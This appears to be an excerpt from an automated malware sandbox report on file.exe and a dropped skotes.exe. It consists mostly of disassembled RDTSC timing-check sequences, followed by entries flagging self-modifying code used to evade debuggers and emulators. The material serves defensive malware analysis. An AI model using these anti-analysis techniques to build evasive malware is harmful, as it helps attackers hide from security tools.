Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C909D2 second address: 4C90A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 01E17F5Ah 0x00000008 jmp 00007F6968D5473Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 mov si, di 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6968D54744h 0x00000023 xor esi, 0C7B73F8h 0x00000029 jmp 00007F6968D5473Bh 0x0000002e popfd 0x0000002f mov si, C52Fh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90799 second address: 4C907B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C907B9 second address: 4C907BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3001B second address: 4C3003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3003F second address: 4C30045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30045 second address: 4C3005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3005A second address: 4C30078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6968D5473Ch 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov al, 95h 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cx, di 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90C45 second address: 4C90C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90C49 second address: 4C90C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90C4F second address: 4C90C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90C55 second address: 4C90CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F6968D5473Eh 0x00000012 jmp 00007F6968D54742h 0x00000017 pop eax 0x00000018 mov bx, 6D36h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6968D54743h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90CA7 second address: 4C90CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6969412EAEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6969412EB0h 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6969412EAAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90CF6 second address: 4C90D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D05 second address: 4C90D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D34 second address: 4C90D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push BF632AD1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D5473Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D5A second address: 4C90D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D60 second address: 4C90D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90D64 second address: 4C90D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90DC2 second address: 4C90E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov cx, 8E0Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6968D54746h 0x00000017 and ah, 00000058h 0x0000001a jmp 00007F6968D5473Bh 0x0000001f popfd 0x00000020 mov ecx, 0C07F40Fh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90E06 second address: 4C90E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 1127D17 second address: 1127D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jnp 00007F6968D54736h 0x0000000d jnp 00007F6968D54736h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 1127E95 second address: 1127EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6969412EB9h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 1127EB6 second address: 1127EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6968D54736h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 1127EC2 second address: 1127EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 1127EC6 second address: 1127EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6968D54745h 0x0000000f jg 00007F6968D54736h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4029A second address: 4C4029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4029E second address: 4C402A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C402A4 second address: 4C402C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C402C3 second address: 4C402E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C402E0 second address: 4C40329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, FC92h 0x00000007 pushfd 0x00000008 jmp 00007F6969412EB3h 0x0000000d sub ecx, 5F336C8Eh 0x00000013 jmp 00007F6969412EB9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ebx, 268075A2h 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, edi 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B2E9 second address: 112B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B2EF second address: 112B2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40329 second address: 4C4035F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov esi, edx 0x0000000b mov dh, 7Dh 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 jmp 00007F6968D54740h 0x00000015 push FFFFFFFEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F6968D5473Dh 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4035F second address: 4C40365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B44C second address: 112B452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B452 second address: 112B480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jg 00007F6969412EB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6969412EADh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B480 second address: 112B49A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F6968D5473Ch 0x00000014 jnl 00007F6968D54736h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B49A second address: 112B4D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F6969412EA6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d call 00007F6969412EADh 0x00000012 xor cx, BEC6h 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1246025Ch] 0x0000001e mov edx, dword ptr [ebp+122D2CE3h] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6969412EADh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40365 second address: 4C40369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40369 second address: 4C4036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B594 second address: 112B5AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6968D5473Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4036D second address: 4C40391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F6969412EA9h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6969412EB1h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B5AF second address: 112B5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6968D54736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B5B9 second address: 112B649 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2F3Bh] 0x00000013 mov dword ptr [ebp+122D30EAh], esi 0x00000019 push 00000000h 0x0000001b adc di, 81FBh 0x00000020 mov dword ptr [ebp+122D31B5h], eax 0x00000026 push 75611D31h 0x0000002b push ecx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jno 00007F6969412EA6h 0x00000035 popad 0x00000036 pop ecx 0x00000037 xor dword ptr [esp], 75611DB1h 0x0000003e mov edx, dword ptr [ebp+122D2DD3h] 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 mov esi, eax 0x0000004a push 00000003h 0x0000004c mov edi, dword ptr [ebp+122D2F67h] 0x00000052 call 00007F6969412EA9h 0x00000057 je 00007F6969412EBEh 0x0000005d jng 00007F6969412EB8h 0x00000063 jmp 00007F6969412EB2h 0x00000068 push eax 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F6969412EB3h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40391 second address: 4C403A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B649 second address: 112B666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F6969412EA6h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B666 second address: 112B66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B66C second address: 112B69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6969412EB5h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6969412EB1h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B69E second address: 112B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403A1 second address: 4C403A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B6A4 second address: 112B6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6968D54736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B6AE second address: 112B6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B791 second address: 112B796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B796 second address: 112B7E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6969412EB9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F6969412EBEh 0x00000014 push ebx 0x00000015 jmp 00007F6969412EB6h 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F6969412EACh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B7E8 second address: 112B82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6968D5474Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F6968D54749h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B8D7 second address: 112B8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 112B8DC second address: 112B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1B0E06AAh 0x00000010 mov ecx, ebx 0x00000012 lea ebx, dword ptr [ebp+12460270h] 0x00000018 push esi 0x00000019 movzx edx, bx 0x0000001c pop esi 0x0000001d xchg eax, ebx 0x0000001e push esi 0x0000001f jl 00007F6968D5473Ch 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F6968D5473Ch 0x0000002f jl 00007F6968D54736h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C403A5 second address: 4C40413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6969412EAEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F6969412EABh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov bl, 44h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F6969412EACh 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6969412EB1h 0x00000031 sbb cx, 47A6h 0x00000036 jmp 00007F6969412EB1h 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e mov cl, 2Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40413 second address: 4C40422 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40422 second address: 4C40426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40426 second address: 4C4043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4043D second address: 4C40478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F6969412EB0h 0x0000000c sub eax, 05A36AD8h 0x00000012 jmp 00007F6969412EABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b call 00007F6969412EA9h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40478 second address: 4C4047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4047C second address: 4C40482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40482 second address: 4C40488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40488 second address: 4C4048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4048C second address: 4C404B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D5473Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C404B8 second address: 4C404CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C404CD second address: 4C404D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C404D3 second address: 4C4051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F6969412EB4h 0x00000012 mov cx, CE41h 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F6969412EB8h 0x00000021 mov eax, 7E638121h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4051C second address: 4C405C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F6968D54749h 0x00000012 pop eax 0x00000013 jmp 00007F6968D5473Eh 0x00000018 mov eax, dword ptr fs:[00000000h] 0x0000001e jmp 00007F6968D54740h 0x00000023 nop 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F6968D5473Eh 0x0000002b xor ecx, 6BD19AA8h 0x00000031 jmp 00007F6968D5473Bh 0x00000036 popfd 0x00000037 mov ebx, eax 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c movsx edx, cx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushfd 0x00000042 jmp 00007F6968D5473Ah 0x00000047 xor ah, 00000008h 0x0000004a jmp 00007F6968D5473Bh 0x0000004f popfd 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C405C0 second address: 4C40655 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 5BB4F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F6969412EB2h 0x00000010 sub esp, 1Ch 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6969412EAEh 0x0000001a sub si, 4298h 0x0000001f jmp 00007F6969412EABh 0x00000024 popfd 0x00000025 mov dx, si 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F6969412EB2h 0x0000002f push eax 0x00000030 jmp 00007F6969412EABh 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F6969412EB6h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6969412EB7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40655 second address: 4C406A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F6968D54746h 0x00000015 jmp 00007F6968D54745h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D64F61 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DCA645 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1174F61 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11DA645 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Special instruction interceptor: First address: 83FC6E instructions caused by: Self-modifying code
